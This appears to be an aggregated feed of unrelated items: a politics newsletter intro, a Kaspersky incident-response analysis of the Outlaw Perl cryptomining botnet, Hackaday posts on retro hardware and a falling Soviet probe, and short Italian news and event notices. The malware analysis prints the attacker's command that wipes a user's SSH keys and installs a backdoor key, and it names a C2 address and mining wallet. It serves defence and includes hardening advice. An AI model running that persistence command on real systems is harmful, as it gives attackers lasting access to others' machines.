HOWDY GANG. THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be in Brussels this week to interview Microsoft's president Brad Smith. You can watch along here on April 30, or put your name down here for one of the final in-person spots.

In other news, I was also just appointed as a member of an independent committee at the United Kingdom's Ofcom regulator to advise on issues related to the online information environment. More on that here.

— Canadians go to the polls on April 28 amid a barrage of online falsehoods. That won't stop Liberal leader Mark Carney almost certainly winning.

— There's a lot of politics to unpack behind the European Union's collective $790 million antitrust fine against Meta and Apple related to the bloc's new competition rules.

— Brussels spent $52 million in 2024 to implement its online safety regime. Those figures will rise by more than a quarter this year.

Let's get started:

digitalpolitics.co/newsletter0…

Introduction

In a recent incident response case in Brazil, we dealt with a relatively simple, yet very effective threat focused on Linux environments. Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Previous research ([1], [2]) described Outlaw samples obtained from honeypots. In this article, we provide details from a real incident contained by Kaspersky, as well as publicly available telemetry data about the countries and territories most frequently targeted by the threat actor. Finally, we provide TTPs and best practices that security practitioners can adopt to protect their infrastructures against this type of threat.

Analysis

We started the analysis by gathering relevant evidence from a compromised Linux system. We identified an odd authorized SSH key for a user called suporte (in a Portuguese-speaking environment, this is an account typically used for administrative tasks in the operating system). Such accounts are often configured to have the same username as the password, which is a bad practice, making it easy for the attackers to exploit them. The authorized key belonged to a remote Linux machine user called mdrfckr, a string found in Dota campaigns, which raised our suspicion.

Suspicious authorized key

After the initial SSH compromise, the threat actor downloads the first-stage script, tddwrt7s.sh, using utilities like wget or curl. This artifact is responsible for downloading the dota.tar.gz file from the attackers’ server. Below is the sequence of commands performed by the attacker to obtain and decompress this file, which is rather typical of them. It is interesting to note that the adversary uses both of the previously mentioned utilities to try to download the artifact, since the system may not have one or another.

Chain of commands used by the attackers to download and decompress dota.tar.gz

After the decompression, a hidden directory, named ".configrc5", was created in the user’s home directory with the following structure:

.configrc5 directory structure

Interestingly enough, one of the first execution steps is checking if other known miners are present on the machine using the script a/init0. If any miners are found, the script tries to kill and block their execution. One reason for this is to avoid possible overuse of the RAM and CPU on the target machine.

Routine for killing and blocking known miners

The script also monitors running processes, identifies any that use 40% or more CPU by executing the command ps axf-o"pid %cpu", and for each such process, checks its command line (/proc/$procid/cmdline) for keywords like "kswapd0","tsm","rsync","tor","httpd","blitz", or "mass" using the grep command. If none of these keywords are found ( grep doesn’t return zero), the process is forcefully killed with the kill-9 command; otherwise, the script prints "don't kill", effectively whitelisting Outlaw’s known or expected high-CPU processes, so it doesn’t accidentally kill them.

Processes checks performed by the threat

After the process checks and killing are done, the b/run file is executed, which is responsible for maintaining persistence on the infected machine and executing next-stage malware from its code. For persistence purposes, the attackers used the following command to wipe the existing SSH setup, create a clean .ssh folder, add a new public key for SSH access, and lock down permissions.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The next-stage malware is a Base64-encoded string inside the b/run script that, once decoded, reveals another level of obfuscation: this time an obfuscated Perl script. Interestingly, the attackers left a comment generated by the obfuscator (perlobfuscator.com) in place.

Obfuscated Perl script

We were able to easily deobfuscate the code using an open-source script available on the same website as used by the attackers (perlobfuscator.com/decode-stun…), which led us to the original source code containing a few words in Portuguese.

Deobfuscated Perl script

This Perl script is an IRC-based botnet client that acts as a backdoor on a compromised system. Upon execution, it disguises itself as an rsync process, creates a copy of itself in the background, and ignores termination signals. By default, it connects to a hardcoded IRC server over port 443 using randomly generated nicknames, joining predefined channels to await commands from designated administrators. The bot supports a range of malicious features including command execution, DDoS attacks, port scans, file download, and upload via HTTP. This provides the attackers with a wide range of capabilities to command and control the botnet.

XMRig miner

Another file from the hidden directory, a/kswapd0, is an ELF packed using UPX, as shown in the image below. We were able to easily unpack the binary for analysis.

kswapd0 identification and unpacking

By querying the hash on threat intelligence portals and by statically analyzing the sample, it became clear that this binary is a malicious modified version of XMRig (6.19.0), a cryptocurrency miner.

XMRig version

We also found a configuration file embedded in the binary. This file contains the attacker’s mining information. In our scenario, the configuration was set up to mine Monero using the CPU only, with both OpenCL and CUDA (for GPU mining) disabled. The miner runs in the background, configured for high CPU usage. It also connects to multiple mining pools, including one accessible via Tor, which explains the presence of Tor files inside the .configrc5/a directory. The image below shows an excerpt from this configuration file.

XMRig custom configuration

Victims

Through telemetry data collected from public feeds, we have identified victims of the Outlaw gang mainly in the United States, but also in Germany, Italy, Thailand, Singapore, Taiwan, Canada and Brazil, as shown in the chart below.

Countries and territories where Outlaw is most active< (download)

The following chart shows the distribution of recent victims. We can see that the group was idle from December 2024 through February 2025, then a spike in the number of victims was observed in March 2025.

Number of Outlaw victims by month, September 2024–March 2025 (download)

Recommendations

Since Outlaw exploits weak or default SSH passwords, we recommend that system administrators adopt a proactive approach to hardening their servers. This can be achieved through custom server configurations and by keeping services up to date. Even simple practices, such as using key-based authentication, can be highly effective. However, the /etc/ssh/sshd_config file allows for the use of several additional parameters to improve security. Some general configurations include:

• Port <custom_port_number>: changes the default SSH port to reduce exposure to automated scans.
• Protocol 2: enforces the use of the more secure protocol version.
• PermitRootLogin no: disables direct login as the root user.
• MaxAuthTries <integer>: limits the number of authentication attempts per session.
• LoginGraceTime <time>: defines the amount of time allowed to complete the login process (in seconds unless specified otherwise).
• PasswordAuthentication no: disables password-based login.
• PermitEmptyPasswords no: prevents login with empty passwords.
• X11Forwarding no: disables X11 forwarding (used for running graphical applications remotely).
• PermitUserEnvironment no: prevents users from passing environment variables.
• Banner /etc/ssh/custom_banner: customizes the system login banner.

Consider disabling unused authentication protocols:

• ChallengeResponseAuthentication no
• KerberosAuthentication no
• GSSAPIAuthentication no

Disable tunneling options to prevent misuse of the SSH tunnel feature:

• AllowAgentForwarding no
• AllowTcpForwarding no
• PermitTunnel no

You can limit SSH access to specific IPs or networks using the AllowUsers directive:

• AllowUsers *@10.10.10.217
• AllowUsers *@192.168.0.0/24

Enable public key authentication with:

• PubkeyAuthentication yes

Set parameters to automatically disconnect idle sessions:

• ClientAliveInterval <time>
• ClientAliveCountMax <integer>

The following configuration file serves as a template for hardening the SSH service:
Protocol 2
Port 2222

LoginGraceTime 10
PermitRootLogin no
MaxAuthTries 3
IgnoreRhosts yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no

UsePAM yes
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
PrintMotd no
PrintLastLog yes
PermitUserEnvironment no
ClientAliveInterval 300
ClientAliveCountMax 2
PermitTunnel no

Banner /etc/ssh/custom_banner
AllowUsers *@10.10.10.217
While outside sshd_config, pairing your config with tools like Fail2Ban or firewalld rate limiting adds another solid layer of protection against brute force.

Conclusion

By focusing on weak or default SSH credentials, Outlaw keeps improving and broadening its Linux-focused toolkit. The group uses a range of evasion strategies, such as concealing files and folders or obfuscated programs, and uses compromised SSH keys to keep access for as long as possible. The IRC-based botnet client facilitates a wide range of harmful operations, such as command execution, flooding, and scanning, while the deployment of customized XMRig miners can divert processing resources to cryptocurrency mining. By hardening SSH configurations (for instance, turning off password authentication), keeping an eye out for questionable processes, and limiting SSH access to trustworthy users and networks, system administrators can greatly lessen this hazard.

Tactics, techniques and procedures

Below are the Outlaw TTPs identified from our malware analysis.

Indicators of Compromise

• 15f7c9af535f4390b14ba03ddb990c732212dde8 (a)
• 982c0318414c3fdf82e3726c4ef4e9021751bbd9 (init0)
• f2b4bc2244ea8596a2a2a041308aa75088b6bbd5 (kswapd0)
• 4d5838c760238b77d792c99e64bd962e73e28435 (run)
• d0ba24f9fad04720dff79f146769d0d8120bf2ff (decoded Perl script)
• 45[.]9[.]148[.]99 (Attacker’s C2)
• 483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS (Monero wallet)

securelist.com/outlaw-botnet/1…

On a Commodore 64, the computer is normally connected to a monitor with one composite video cable and to an audio device with a second, identical (although uniquely colored) cable. The signals passed through these cables are analog, each generated by a dedicated chip on the computer. Many C64 users may have accidentally swapped these cables when first setting up their machines, but [Matthias] wondered if this could be done purposefully — generating video with the audio hardware and vice versa.

Getting an audio signal from the video hardware on the Commodore is simple enough. The chips here operate at well over the needed frequency for even the best audio equipment, so it’s a relatively straightforward matter of generating an appropriate output wave. The audio hardware, on the other hand, is much less performative by comparison. The only component here capable of generating a fast enough signal to be understood by display hardware of the time is actually the volume register, although due to a filter on the chip the output is always going to be a bit blurred. But this setup is good enough to generate large text and some other features as well.

There are a few other constraints here as well, namely that loading the demos that [Matthias] has written takes so long that the audio can’t be paused while this happens and has to be bit-banged the entire time. It’s an in-depth project that shows mastery of the retro hardware, and for some other C64 demos take a look at this one which is written in just 256 bytes.

youtube.com/embed/_Orvsms7Ils?…

Thanks to [Jan] for the tip!

hackaday.com/2025/04/29/crossi…

A quadrature encoder provides a way to let hardware read movement (and direction) of a shaft, and they can be simple, effective, and inexpensive devices. But [Paulo Marques] observed that when it comes to reading motor speeds with them, what works best at high speeds doesn’t work at low speeds, and vice versa. His solution? PicoEncoder is a library providing a lightweight and robust method of using the Programmable I/O (PIO) hardware on the RP2040 to get better results, even (or especially) from cheap encoders, and do it efficiently.
The results of the sub-step method (blue) resemble a low-pass filter, but is delivered with no delay or CPU burden.
The output of a quadrature encoder is typically two square waves that are out of phase with one another. This data says whether a shaft is moving, and in what direction. When used to measure something like a motor shaft, one can also estimate rotation speed. Count how many steps come from the encoder over a period of time, and use that as the basis to calculate something like revolutions per minute.

[Paulo] points out that one issue with this basic method is that the quality depends a lot on how much data one has to work with. But the slower a motor turns, the less data one gets. To work around this, one can use a different calculation optimized for low speeds, but there’s really no single solution that handles high and low speeds well.

Another issue is that readings at the “edges” of step transitions can have a lot of noise. This can be ignored and assumed to average out, but it’s a source of inaccuracy that gets worse at slower speeds. Finally, while an ideal encoder has individual phases that are exactly 50% duty cycle and exactly 90 degrees out of phase with one another. This is almost never actually the case with cheaper encoders. Again, a source of inaccuracy.

[Paulo]’s solution was to roll his own method with the RP2040’s PIO, using a hybrid approach to effect a “sub-step” quadrature encoder. Compared to simple step counting, PicoEncoder more carefully tracks transitions to avoid problems with noise, and even accounts for phase size differences present in a particular encoder. The result is a much more accurate calculation of motor speed and position without any delays. Most of the work is done by the PIO of the RP2040, which does the low-level work of counting steps and tracking transitions without any CPU time involved. Try it out the next time you need to read a quadrature encoder for a motor!

The PIO is one of the more interesting pieces of functionality in the RP2040 and it’s great to see it used in a such a clever way. As our own Elliot Williams put it when he evaluated the RP2040, the PIO promises never having to bit-bang a solution again.

hackaday.com/2025/04/29/read-m…

It’s not unusual for redundant satellites, rocket stages, or other spacecraft to re-enter the earth’s atmosphere. Usually they pass unnoticed or generate a spectacular light show, and very rarely a few pieces make it to the surface of the planet. Coming up though is something entirely different, a re-entry of a redundant craft in which the object in question might make it to the ground intact. To find out more about the story we have to travel back to the early 1970s, and Kosmos-482. It was a failed Soviet Venera mission, and since its lander was heavily over-engineered to survive entry into the Venusian atmosphere there’s a fascinating prospect that it might survive Earth re-entry.
This model of the earlier Venera 7 probe shows the heavy protection to survive entry into the Venusian atmosphere. Emerezhko, CC BY-SA 4.0.
At the time of writing the re-entry is expected to happen on the 10th of May, but as yet due to its shallow re-entry angle it is difficult to predict where it might land. It is thought to be about a metre across and to weigh just under 500 kilograms, and its speed upon landing is projected to be between 60 and 80 metres per second. Should it hit land rather than water then, its remains are thought to present an immediate hazard only in its direct path.

Were it to be recovered it would be a fascinating artifact of the Space Race, and once the inevitable question of its ownership was resolved — do marine salvage laws apply in space? –we’d expect it to become a world class museum exhibit. If that happens, we look forward to bringing you our report if possible.

This craft isn’t the only surviving relic of the Space Race out there, though it may be the only one we have a chance of seeing up-close. Some of the craft from that era are even still alive.

Header: Moini, CC0.

hackaday.com/2025/04/29/theres…

I carabinieri sono accusati a vario titolo di lesioni, violenza sessuale, abuso d’ufficio, falso in atto pubblico, porto abusivo d’armi e rifiuto di denuncia: la pena più grave, di 9 anni e 8 mesi, è stata inflitta al maresciallo Alessandro Fiorentino.

I magistrati hanno anche fatto delle intercettazioni telefoniche.

In una di queste intercettazioni, uno dei carabinieri raccomandava a un collega di non parlare a nessuno di quello che accadeva in caserma: «Da questa caserma non deve uscire niente, dobbiamo essere come la mafia», diceva.

ilpost.it/2025/04/29/carabinie…

domani, mercoledì 30 aprile, a San Giovanni, Teatro Basilica: lettura collettiva delle poesie del libro (recentemente ristampato in ebook gratuitamente scaricabile) “Strana categoria”, di Carlo Bordini.
slowforward.net/2025/04/24/30-…

per leggere il libro: slowforward.net/2025/04/24/car…

#poesia #carlobordini #teatrobasilica #lettura #reading